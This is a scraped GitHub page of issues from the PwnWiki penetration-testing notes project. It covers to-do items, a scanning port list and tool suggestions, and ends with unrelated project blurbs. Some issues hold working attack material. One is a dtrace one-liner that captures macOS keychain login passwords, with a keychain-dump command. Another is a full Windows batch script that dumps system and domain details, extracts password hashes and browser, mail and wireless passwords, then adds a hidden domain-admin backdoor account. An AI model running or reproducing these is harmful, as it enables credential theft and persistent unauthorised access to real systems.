pwnwiki / pwnwiki.github.io Goto Github PK
View Code? Open in Web Editor NEWPwnWiki - The notes section of the pentesters mind.
Home Page: http://pwnwiki.io
License: MIT License
PwnWiki - The notes section of the pentesters mind.
Home Page: http://pwnwiki.io
License: MIT License
Scrape the content from https://gist.github.com/willurd/5720255
Take the content in the https://github.com/pwnwiki/pwnwiki.github.io/blob/master/2besorted/gdoc_osx.md file and move it to the appropriate categories/files.
Grab info on reverse shells from http://highon.coffee/blog/reverse-shell-cheat-sheet/
Don't have time to add this in the appropriate place:
sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}') (from https://twitter.com/fel1x/status/613420320104558592)
Dump whole OS X keychain: security dump-keychain -d login.keychain > keychain.txt && srm keychain.txt
Source: https://twitter.com/pentestcli
The "easy copy" lines need to be something some can copy paste into any tool that accepts comma separated ports (nmap/metasploit) of all the ports listed in its category.
Intent: Try to create a series of lists for scanning during a pentest (internal or externally). First for just discovery, then for authenticated access, then for pwnage, and finally just for curiosity.
==========================
All further edits should be done via the wiki on Github.
Thanks for everyone's help and feedback!
==========================
Discovery Ports:
* easy copy - `21,22,23,25,139,443,445,631,3389,6000-6009,8080,8000,8443`
* FTP: 21
* SSH: 22
* Telnet: 23
* SMTP: 25
* Finger: 7
* HTTP: 80
* Kerberos: 88
* POP3: 110
* SUNRPC (Unix RPC): 111 (think: rpcinfo)
* NetBIOS: 139
* IMAP 143
* LDAP: 389
* HTTPS: 443
* LotusNotes: 1352
* Microsoft DS: 445
* RSH: 514
* CUPS: 631
* NFS: 2049
* Webrick(Ruby Webserver): 3000
* RDP: 3389
* Munin: 4949
* SIP: 5060
*PCAnywhere: 5631 (5632)
* NRPE (*nix) /NSCLIENT++ (win): 5666 (evidence of Nagios server on network)
* Alt-HTTP: 8080
* Alt-HTTP tomcat: 9080
* Another HTTP: 8000 (mezzanine in development mode for example)
* Nessus HTTPS: 8834
* Proxmox: 8006
* Splunk: 8089 (also on 8000)
* Alt HTTPS: 8443
* vSphere: 9443
* X11: 6000-6009 (+1 to portnum for additional displays) (see xspy, xwd, xkey for exploitation)
* VNC: 5900, 5901+ (Same as X11; +1 to portnum for each user/dipslay over VNC. SPICE is usually in this range as well)
Printers: 9100, 515
* Dropbox lansync: 17500
UDP Discovery:
* easy copy - `53,123,161,1434`
* DNS: 53
* XDMCP: 177 (via NSE script --script broadcast-xdmcp-discover, discover nix boxes hosting X)
* OpenVPN: 1194
* MSSQL Ping: 1434
* SUNRPC (Unix RPC): 111 (yeah, it's UDP, too)
* SNMP 161
* Network Time Protocol (NTP): 123
* syslog : 514
* UPNP: 1900
* Isakmp - 500 (ike PSK Attack)
* vxworks debug: 17185 (udp)
Authentication Ports (other than ones already listed):
* easy copy - `1494`
* Citrix: 1494
* WinRM: 80,5985 (HTTP), 5986 (HTTPS)
* VMware Server: 8200, 902, 9084
* DameWare: 6129
Easy-win Ports:
* Java RMI - 1099, 1098
* coldfusion default stand alone - 8500
* IPMI UDP(623) (easy crack or auth bypass)
* 6002, 7002 (sentinel license monitor (reverse dir traversal, sometimes as SYSTEM))
* GlassFish: 4848
* easy copy - `9060`
* IBM Web Sphere: 9060
* Webmin or BackupExec: 10000
* memcached: 11211
* DistCC: 3632
* SAP Router: 3299
Database Ports:
* easy copy - `3306,1521-1527,5432,5433,1433,3050,3351,1583,8471,9471`
* MySQL: 3306
* PostgreSQL: 5432
* PostgreSQL 9.2: 5433
* Oracle TNS Listener: 1521-1527
* Oracle XDB: 2100
* MSSQL: 1433
* Firebird / Interbase: 3050
* PervasiveSQL: 3351, 1583
* DB2/AS400 8471, 9471
* Sybase 5000
SCADA / ICS:
(source: http://www.digitalbond.com/tools/the-rack/control-system-port-list/ )
* BACnet/IP: UDP/47808
* DNP3: TCP/20000, UDP/20000
* EtherCAT: UDP/34980
* Ethernet/IP: TCP/44818, UDP/2222, UDP/44818
* FL-net: UDP/55000 to 55003
* Foundation Fieldbus HSETCP/1089 to 1091, UDP/1089 to 1091
* ICCP: TCP/102
* Modbus TCP: TCP/502
* OPC UA Binary: Vendor Application Specific
* OPC UA Discovery Server: TCP/4840
* OPC UA XML: TCP/80, TCP/443
* PROFINET: TCP/34962 to 34964, UDP/34962 to 34964
* ROC PLus: TCP/UDP 4000
Interesting Port Ranges:
* HTTP(S) Ports: 8000-9000
Web easy-win URLs: (moved to: https://etherpad.mozilla.org/weburl-easywins )
awk '$2~/tcp$/' nmap-services | sort -r -k3 | head -n 1000 # same for udp
Content is here: http://resources.infosecinstitute.com/backdoor-sql-injection/
Move the content from the "cats" dir files (https://github.com/pwnwiki/pwnwiki.github.io/tree/master/2besorted/cats) into their appropriate categories.
I think we should have an entire page dedicated to netcat and the things you can do. I know that SANS (https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf) has one. I bet we can get a bunch of other content for it too.
Got the link for this from: http://synjunkie.blogspot.com/2008/03/basic-dos-foo.html
::start of file
@echo off
::create the directory with a computer name for the system and move there
if not exist \switchblade\dump md \switchblade\dump >nul
if not exist \switchblade\dump%computername% md \switchblade\dump%computername% >nul
cd \switchblade\tools\ >nul
::create netdump.txt with all the information that the dos command net.exe will extract
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump%computername%%computername%-net.log 2>&1
ipconfig /all >> \switchblade\dump%computername%%computername%-net.log 2>&1
route print >> \switchblade\dump%computername%%computername%-net.log 2>&1
ipconfig /displaydns >> \switchblade\dump%computername%%computername%-net.log 2>&1
netstat -anbv >> \switchblade\dump%computername%%computername%-net.log 2>&1
netsh diag show all /v >> \switchblade\dump%computername%%computername%-net.log 2>&1
netsh firewall show conf >> \switchblade\dump%computername%%computername%-net.log 2>&1
netsh firewall show port >> \switchblade\dump%computername%%computername%-net.log 2>&1
arp -a >> \switchblade\dump%computername%%computername%-net.log 2>&1
net session >> \switchblade\dump%computername%%computername%-net.log 2>&1
::user info creation
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump%computername%%computername%-user.log 2>&1
net view >> \switchblade\dump%computername%%computername%-user.log 2>&1
net share >> \switchblade\dump%computername%%computername%-user.log 2>&1
net accounts >> \switchblade\dump%computername%%computername%-user.log 2>&1
net localgroup >> \switchblade\dump%computername%%computername%-user.log 2>&1
net localgroup /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
net localgroup administrators /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
net group "domain admins" /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
net group "backup operators" /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
net group "domain users" /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
gpresult >> \switchblade\dump%computername%%computername%-user.log 2>&1
.\whosthere.exe >> \switchblade\dump%computername%%computername%-user.log 2>&1
.\whosthere-alt.exe >> \switchblade\dump%computername%%computername%-user.log 2>&1
.\gsecdump.exe -a >> \switchblade\dump%computername%%computername%-user 2>&1
::dump other PC info
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump%computername%%computername%-PC.log 2>&1
net start >> \switchblade\dump%computername%%computername%-PC.log 2>&1
set >> \switchblade\dump%computername%%computername%-PC.log 2>&1
tree /f >> \switchblade\dump%computername%%computername%-PC.log 2>&1
::slurp Browser info
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump%computername%%computername%_browser.log 2>&1
cscript //nologo .\iehistquick.vbs >> \switchblade\dump%computername%%computername%browser.log 2>&1
IF EXIST "C:\Program Files\Mozilla Firefox\firefox.exe" .\FirePassword.exe >> \switchblade\dump%computername%%computername%browser.log 2>&1
echo **********[End Of File]*********** >> \switchblade\dump%computername%%computername%_browser.log 2>&1
::create the nirsoft tools html files, some of them are known hacktools and will crash out script depends on your AV killer to run first
nircmd.exe exec2 hide "\switchblade\dump%computername%" "\switchblade\tools\fgdump.exe" -s -r -k
nircmd.exe execmd mylastsearch.exe /shtml "\switchblade\dump~$sys.computername$\InternetSearch.html"
nircmd.exe execmd pspv.exe /shtml "\switchblade\dump~$sys.computername$\IEPassword.html"
nircmd.exe execmd iepv.exe /shtml "\switchblade\dump~$sys.computername$\IEProtected.html"
nircmd.exe execmd nk2view.exe /shtml "\switchblade\dump~$sys.computername$\recentEmail.html"
nircmd.exe execmd recentfilesview.exe /shtml "\switchblade\dump~$sys.computername$\recentfiles.html"
IF EXIST "C:\Program Files\Mozilla Firefox\firefox.exe" nircmd.exe execmd passwordfox.exe /shtml "\switchblade\dump~$sys.computername$\FFPassword.html"
nircmd.exe execmd USBDeview.exe /shtml "\switchblade\dump~$sys.computername$\USB.html"
nircmd.exe execmd mspassSLURP.exe /shtml "\switchblade\dump~$sys.computername$\msn.html"
nircmd.exe execmd netpass.exe /shtml "\switchblade\dump~$sys.computername$\netpassword.html"
nircmd.exe execmd iehv.exe /shtml "\switchblade\dump~$sys.computername$\IEhistory.html"
nircmd.exe execmd ProduKey.exe /shtml "\switchblade\dump~$sys.computername$\keys.html"
nircmd.exe execmd MozillaHistoryView.exe /shtml "\switchblade\dump~$sys.computername$\FFXHistory.html"
nircmd.exe execmd WirelessKeyView.exe /shtml "\switchblade\dump~$sys.computername$\Wireless.html"
nircmd.exe execmd mailpv.exe /shtml "\switchblade\dump~$sys.computername$\mail.html"
nircmd.exe execmd mzcv.exe /shtml "\switchblade\dump~$sys.computername$\FFXCookie.html"
nircmd.exe execmd cports.exe /shtml "\switchblade\dump~$sys.computername$\OpenPorts.html"
nircmd.exe execmd chromepass.exe /shtml "\switchblade\dump~$sys.computername$\ChromePass.html"
nircmd.exe execmd chromecacheview.exe /shtml "\switchblade\dump~$sys.computername$\ChromePass.html"
nircmd.exe execmd OpenedFilesView.exe /shtml "\switchblade\dump~$sys.computername$\openfiles.html"
nircmd.exe execmd wul.exe /shtml "\switchblade\dump~$sys.computername$\updates-bugfixes.html"
nircmd.exe execmd dialupass2.exe /shtml "\switchblade\dump~$sys.computername$\DialUp2.html"
::finally if we didnt get caught
net user helpdeskadmin Password!@#$ /add
net localgroup Administrators helpdeskadmin /add
net group "domain admins" helpdeskadmin /add
exit
Now that scripts are allowed in the navigation.md lets look at moving the show/hide code up to it.
Users may need to print out files from the pwnwiki site. HTML doesn't always play nice with print.Optimally there should a button or something that a user could click and get a pdf generated from a pwnwiki page.
Also, this will help to move people from using the google documents as an authoritative source.
Just thought of this whilst going though "AT is the New Black", but do we actually have any decent documentation on Mimikatz and WCE? If not it would be good to add in some good documentation on these two tools to our post exploitation for Windows section as they tend to come in handy on a pentest.
Take the content in the https://github.com/pwnwiki/pwnwiki.github.io/blob/master/2besorted/gdoc_linux.md file and move it to the appropriate categories/files.
http://pwnwiki.io/#!presence/windows/network.md
lists net group /domain and net localgroup /domain as only working on a Windows Domain Controller. This is incorrect, should probably be only works on "Windows Domain"
Add https://isc.sans.edu/forums/diary/No+Wireshark+No+TCPDump+No+Problem/19409/ to the pwnwiki
Content from here: http://www.wordpress-secure.org/
The below repo is maintained by me. This repo is all tweets of @wincmdfu
https://github.com/madhuakula/wincmdfu
It contains many useful windows exploitation, post exploitation and other resources. Please let me know how can I add them to this repo.
Thanks,
Madhu Akula
This is the Google form that is advertised for people to submit their content to.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.